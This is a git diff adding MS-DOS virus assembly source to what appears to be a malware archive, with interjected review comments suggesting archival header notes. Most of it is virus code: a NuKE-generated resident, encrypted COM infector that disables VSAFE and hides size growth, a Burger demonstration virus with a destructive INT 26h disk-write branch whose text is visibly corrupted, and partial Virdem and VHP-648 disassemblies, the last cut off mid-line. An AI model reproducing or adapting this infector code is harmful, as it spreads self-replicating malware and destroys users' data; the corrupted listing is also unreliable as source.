bx,1 + mov cx,67h + nop + lea dx,cs:[404h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_13: ; xref 8C04:02F0 + mov ah,40h ; '@' + mov bx,1 + mov cx,102h + nop + lea dx,cs:[404h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,2 + mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h) + mov dl,bl + int 21h ; DOS Services ah=function 02h + ; display char dl + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dh=sec + mov ah,0Ch + mov al,1 + int 21h ; DOS Services ah=function 0Ch + ; clear keybd buffer & input al + or dl,30h ; '0' + and dl,bl + cmp dl,al + je loc_14 ; Jump if equal + mov bl,dl + mov ah,2 + mov dl,20h ; ' ' + int 21h ; DOS Services ah=function 02h + ; display char dl + mov dl,3Eh ; '>' + int 21h ; DOS Services ah=function 02h + ; display char dl + mov dl,bl + + int 21h ; DOS Services ah=function 02h + ; display char dl + mov 
dl,3Ch ; '<' + int 21h ; DOS Services ah=function 02h + ; display char dl + mov ah,40h ; '@' + mov bx,1 + mov cx,3Ch + nop + lea dx,cs:[507h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_14: ; xref 8C04:0330 + mov ah,40h ; '@' + mov bx,1 + mov cx,37h + nop + lea dx,cs:[544h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,es:data_17e ; (8C04:FD00=0) + push ax + ret + +; +; SUBROUTINE +; +; Called from: 8C04:02E5 +; + +sub_2 proc near + mov ah,0Eh + mov dl,cs:data_10 ; (8C04:03E1=0) + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov ah,3Bh ; ';' + lea dx,cs:[3E2h] ; Load effective addr + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + ret +sub_2 endp + + +; +; SUBROUTINE +; +; Called from: 8C04:024C +; + +sub_3 proc near + mov ah,42h ; 'B' + mov al,0 + mov dx,500h + nop + + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + ret +sub_3 endp + + db 0 +data_5 dw 0 ; xref 8C04:0120, 0193, 01BE, 01C4 + ; 01D6 +data_6 dw 600h ; xref 8C04:015D, 026A, 0274 + db "*.com", 00h + db 2Ah, 00h,0FFh, 00h, 00h, 00h + db 00h, 00h, 3Fh, 00h + db "????????exe" + db 00h, 00h, 00h + db 00h, 00h + db "????????com" + db 33 dup (0) + db 5Ch, 00h +data_10 db 0 ; xref 8C04:0139, 0370 + db 5Ch + db 33 dup (0) + db 'Virdem Ver.: 1.06' + + +data_12 db ' (Generation 0) aktive.', 0Ah, 0Dh + +copyright db 'Copyright by R.Burger 1986,1987' + db 0Ah, 0Dh, 'Phone.: D - 05932/5451' + db ' ', 0Ah, 0Dh, ' ', 0Ah, 0Dh, 'T' + db 'his is a demoprogram for ', 0Ah, 0Dh + db 'computerviruses. 
Please put in a' + db ' ', 0Ah, 0Dh, 'number now.', 0Ah + db 0Dh, 'If you', 27h, 're right, yo' + db 'u', 27h, 'll be', 0Ah, 0Dh, 'abl' + db 'e to continue.', 0Ah, 0Dh, 'The ' + db 'number is between ', 0Ah, 0Dh, '0' + db ' and ', 0 + db 0Ah, 0Dh, 'Sorry, you', 27h, 're ' + db 'wrong', 0Ah, 0Dh, ' ', 0Ah + db 0Dh, 'More luck at next try ....', 0Ah + db 0Dh, 0 + db 0Ah, 0Dh, 'Famous. You', 27h, 're' + db ' right.', 0Ah, 0Dh, 'You', 27h, 'l' + db 'l be able to continue. ', 0Ah, 0Dh + db 0 + db 0Ah, 0Dh, 'All your programs are', 0Ah + db 0Dh, 'struck by VIRDEM.COM now.', 0Ah + db 0Dh + db 0 + +seg_a ends + + end start + + CROSS REFERENCE - KEY ENTRY POINTS + + seg:off type label + ---- ---- ---- --------------- + 8C04:0100 far start + + Interrupt Usage Synopsis + + Interrupt 21h : terminate, cs=progm seg prefx + Interrupt 21h : display char dl + Interrupt 21h : clear keybd buffer & input al + Interrupt 21h : set default drive dl (0=a:) + Interrupt 21h : get default drive al (0=a:) + Interrupt 21h : get time, cx=hrs/min, dh=sec + Interrupt 21h : get DTA ptr into es:bx + Interrupt 21h : set current dir, path @ ds:dx + Interrupt 21h : open file, al=mode,name@ds:dx + Interrupt 21h : close file, bx=file handle + Interrupt 21h : read file, cx=bytes, to ds:dx + Interrupt 21h : write file cx=bytes, to ds:dx + Interrupt 21h : move file ptr, cx,dx=offset + Interrupt 21h : get/set file attrb, nam@ds:dx + Interrupt 21h : get present dir,drive dl,1=a: + Interrupt 21h : find 1st filenam match @ds:dx + Interrupt 21h : find next filename match + Interrupt 21h : get/set file date & time + + I/O Port Usage Synopsis + + No I/O ports used. + diff --git a/MSDOS/Virus.MSDOS.Unknown.virus.asm b/MSDOS/Virus.MSDOS.Unknown.virus.asm new file mode 100644 index 00000000..50ed3ede --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus.asm 
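Review bot: Nothing in the file states that it is a disassembler listing rather than the author's source, although the `Passes: 5 Analysis Options on: QRS` header, the `; xref 8C04:...` annotations and the trailing `CROSS REFERENCE - KEY ENTRY POINTS` / `Interrupt Usage Synopsis` tables that follow `end start` all point that way. A header comment such as `; Disassembly listing (analyzer output); the cross-reference and interrupt tables after END are listing output, not source` would keep a reader from treating the unprefixed trailing tables as part of the program. The generating tool is not named anywhere in the file, so the comment should describe the format rather than guess at a product.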
@@ -0,0 +1,473 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +sub byte ptr [di],059h +xor word ptr [di],0cb6fh +not word ptr [di] +inc byte ptr [di] +add byte ptr [di],03fh +xor word ptr [di],01bd8h +sub word ptr [di],05c54h +sub word ptr [di],0ccdh +not word ptr [di] +not word ptr [di] +inc word ptr [di] +not word ptr [di] +not word ptr [di] +inc byte ptr [di] +sub word ptr [di],0f965h +inc word ptr [di] +sub byte ptr [di],072h +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! 
+ ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. 
AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +add byte ptr [di],072h +dec word ptr [di] +add word ptr [di],0f965h +dec byte ptr [di] +not word ptr [di] +not word ptr [di] +dec word ptr [di] +not word ptr [di] +not word ptr [di] +add word ptr [di],0ccdh +add word ptr [di],05c54h +xor word ptr [di],01bd8h +sub byte ptr [di],03fh +dec byte ptr [di] +not word ptr [di] +xor word ptr [di],0cb6fh +add byte ptr [di],059h +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov cx,50 ;50 beep's! +beep: ;beep label! +mov ax,0E07h ; +int 10h ;print beep char +loop beep ;go! +NO_DAY: ; +ret ; +;--------------------------------- + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... 
+ int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 020H ;day for the action +action_mes Db 0dH ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.virus0b.asm b/MSDOS/Virus.MSDOS.Unknown.virus0b.asm new file mode 100644 index 00000000..3dab1e29 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus0b.asm 
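Review bot: The header block at the top of the file credits the generator but records none of the identification traits an analyst cataloguing this sample would key on, although all of them are visible in the body: the residency probe `MOV AX,0CACAH / INT 21H / CMP Bh,0CAH`, the timestamp infection marker `FECHA DW 01eH` (a 5-bit seconds/2 field of 30, i.e. 60 seconds, outside the valid range, which is also what the `dir_s` path masks out with `and ax,1fh`), and the `ANTI_V` routine's `MOV AX,0FA01H / MOV DX,5945H / INT 21H` against VSAFE. For an archived listing those belong in the header as a one-line note, e.g. `; Archive note: residency check INT 21h AX=CACAh -> BH=CAh; infected files marked by timestamp seconds=60; unloads VSAFE via INT 21h AX=FA01h`, so the file can be classified without re-reading the code. The `dir_s` block already carries its own attribution comment naming outside sources; that provenance should be carried into the header alongside the generator version rather than left at the bottom of the file.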
@@ -0,0 +1,396 @@ +; Virus in Assembly Language +; -------------------------- + +;Most viruses out there have been written in assembly because assembly has the +;unique ability to bypass operating system security. +;Here is an example of a virus written under MS-DOS 2.1 and can obviously be +;compiled in the later versions. The article contains remarks so as to further +;explain the parts. Programmers may wish to delete those segments if desired. + +;************************************************** +; Program Virus +; Version 1.1 +; Writter : R. Burger +; Created 1986 +; This is a demonstration program for computer +; viruses. It has the ability to replace itself. +; and thereby modify other programs. Enjoy. +;************************************************** + +Code Segment + Assume CS:Code +progr equ 100h + ORG progr + +;************************************************** +; The three NOP's serve as the marker byte of the +; virus which allow it to identify a virus. +;************************************************** + +MAIN: + nop + nop + nop + +;************************************************** +; Initialize the pointers +;************************************************** + + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +;************************************************** +; Get the selected drive +;************************************************** + + mov ah,19h ;drive? + int 21h + +;************************************************** +; Get the current path on the current drive +;************************************************** + + mov cs:drive,al ;save drive + mov ah,47h ;dir? + mov dh,0 + add al,1 + mov dl,al ;in actual drive + lea si,cs:old_path ; + int 21h + +;************************************************** +; Get the number of drives present. 
If only one +; is present, the pointer for the search order +; will be set to serach order + 6 +;************************************************** + + mov as,0eh ;how many disks + mov dl,0 ; + int 21h + + mov al,01 + cmp al,01 ;one drive + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +;************************************************** +; Carry is set, if no more .COM's are found. +; Then, to avoid unnecessary work, .EXE files will +; be renamed to .COM files and infected. +; This causes the error message "Program to large +; to fit memory" when starting larger infected +; EXE programs. +;************************************************* + +change_disk: + jnc no_name_change + mov ah,17h ;change .EXE to .COM + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change ;.EXE found? + +;**************************************************** +; If neither .COM nor .EXE is found then sectors +; will be overwritten depending on the system time +; in milliseconds. This is the time of the complete +; "infection" of a storage medium. The virus can +; find nothing more to infect and starts its destruction +;***************************************************** + + mov ah,2ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; write crap on disk + +;****************************************************** +; Check if the end of the search order table has been +; reached . If so, end. +;****************************************************** + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +;**************************************************** +; Get new drive from the search order table and +; select it . 
+;*************************************************** + +hups2: + mov ah,0eh + int 21h ;change disk + +;*************************************************** +; Start in the root directory +;*************************************************** + + mov ah,3bh ;change path + lea dx,path + int 21h + jmp find_first_file + +;************************************************** +; Starting from the root, search for the first +; subdir. FIrst convert all .EXE files to .COM +; in the old directory +;************************************************** + +find_first_subdir: + mov ah,17h ;change .exe to .com + lea dx,cs:maske_exe + int 21h + mov ah,3bh ;use root directory + lea dx,path + int 21h + mov ah,04eh ;search for first subdirectory + mov cx,00010001b ;dir mask + lea dx,maske_dir ; + int 21h ; + jc change_disk + mov bx,CS:counter + INC,BX + DEC bx + jz use_next_subdir + +;************************************************* +; Search for the next subdirectory. If no more +; directories are found, the drive will be changed. +;************************************************* + +find_next_subdir: + mov ah,4fh ; search for next subdir + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +;************************************************* +; Select found directory. +;************************************************** + +use_next_subdir: + mov ah,2fh ;get dta address + int 21h + add bx,1ch + mov es:[bx],'\` ;address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh ;change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov CS:counter,bx + +;************************************************** +; Find first .COM file in the current directory. +; If there are none, search the next directory. 
+;************************************************** + +find_first_file: + mov ah,04eh ;Search for first + mov cx,00000001b ;mask + lea dx,maske_com ; + int 21h ; + jc find_first_subdir + jmp check_if_ill + +;************************************************** +; If program is ill(infected) then search for +; another other. +;************************************************** + +find_next_file: + mov ah,4fh ;search for next + int 21h + jc find_first_subdir + +;************************************************* +; Check is already infected by virus. +;************************************************** + +check_if_ill: + mov ah,3dh ;open channel + mov al,02h ;read/write + mov dx,9eh ;address of name in dta + int 21 + mov bx,ax ;save channel + mov ah,3fh ; read file + mov ch,buflen ; + mov dx,buffer ;write in buffer + int 21h + mov ah,3eh ;close file + int 21h + +;*************************************************** +; This routine will search the three NOP's(no +; operation).If present there is already an infection. +; We must then continue the search +;**************************************************** + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + +;*************************************************** +; This routine will BY PASS MS-DOS WRITE PROTECTION +; if present. Very important ! +;*************************************************** + + mov ah,43h ;write enable + mov al,0 + mov dx,9eh ;address of name in dta + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + +;**************************************************** +; Open file for read/write access. +;***************************************************** + + mov ah,3dh ;open channel + mov al,02h ;read/write + mov dx,9eh ;address of name in dta + int 21h + +;**************************************************** +; Read date entry of program and save for future +; use. 
+;**************************************************** + + mov bx,ax ;channel + mov ah,57h ;get date + mov al.0 + int 21h + push cx ;save date + push dx + +;**************************************************** +; The jump located at address 0100h of the program +; will be saved for further use. +;***************************************************** + + mov dx,cs:[conta] ;save old jmp + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] ;save new jump + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + +;***************************************************** +; The virus copies itself to the start of the file. +;***************************************************** + + mov ah,57h ;write date + mov al,1 + pop dx + pop cx ;restore date + int 21h + +;***************************************************** +; Close the file. +;***************************************************** + + mov ah,3eh ;close file + int 21h + +;***************************************************** +; Restore the old jump address. The virus saves at +; address "conta" the jump which was at the start of +; the host program. +; This is done to preserve the executability of the +; host program as much as possible. +; After saving it still works with the jump address +; contained in the virus. The jump address in the +; virus differs from the jump address in memory. +;**************************************************** + + mov dx,cs:[jmpbuf] ;restore old jump + mov cs:[conta],dx +hops: nop + call use_old + +;**************************************************** +; Continue with the host program. +;**************************************************** + +cont db 0e9h ;make jump +conta dw 0 + mov ah,00 + int 21h + +;*************************************************** +; Reactivate the selected drive at the start of +; the program. 
+;*************************************************** + +use_old: + mov ah,0eh ;use old drive + mov dl,cs:drive + int 21h + +;*************************************************** +; Reactivate the selected path at the start of +; the program. +;*************************************************** + + mov ah,3bh ;use old drive + lea dx,old_path-1 ;get old path and backslash + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,offh +pointer dw 0000 ;pointer f. search order +counter dw 0000 ;counter f. nth. search +disks db 0 ;number of disks + +maske_com db "*.com",00 ;search for com files +maske_dir db "*",00 ;search for dir's +maske_exe db offh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db offh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e00h ;a safe place + +buflen equ 230h ;lenght of virus!!!! + ;carefull + ;if changing!!!! +jmpbuf equ buffer+buflen ;a safe place for jmp +path db "\",0 ;first place +drive db 0 ;actual drive +back_slash db "\" +old_path db 32 dup (?) ;old path + +code ends + +end main + +;[ END OF THIS VIRUS PROGRAM ] + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus2.asm b/MSDOS/Virus.MSDOS.Unknown.virus2.asm new file mode 100644 index 00000000..59911d23 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus2.asm 
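Review bot: The file is being added as if it were assemblable source, but the text is visibly a corrupted transcription (e.g. `mov as,0eh`, `INC,BX`, `mov al.0`, `offh` in the `search_order`/`maske_exe` data), and its header does not say so; it should be labelled as a transcribed listing rather than verified source. The same header also omits the fact that the `change_disk` path reads the clock with `mov ah,2ch` and then issues `int 26h` (absolute disk write), i.e. the sample carries a destructive payload, which is the first thing anyone handling the archive needs to know. A header line such as `; Archive note: transcribed listing, not verified to assemble; contains a destructive INT 26h disk-write branch at change_disk` would cover both points. The existing "Most viruses ... bypass operating system security" preamble is editorial and could be kept as-is below that note.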
@@ -0,0 +1,331 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + +message db 'Hello, world!$' + + mov ah,9 + mov dx,offset message + int 21 + int 20 + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH=' in the environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + 
je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov 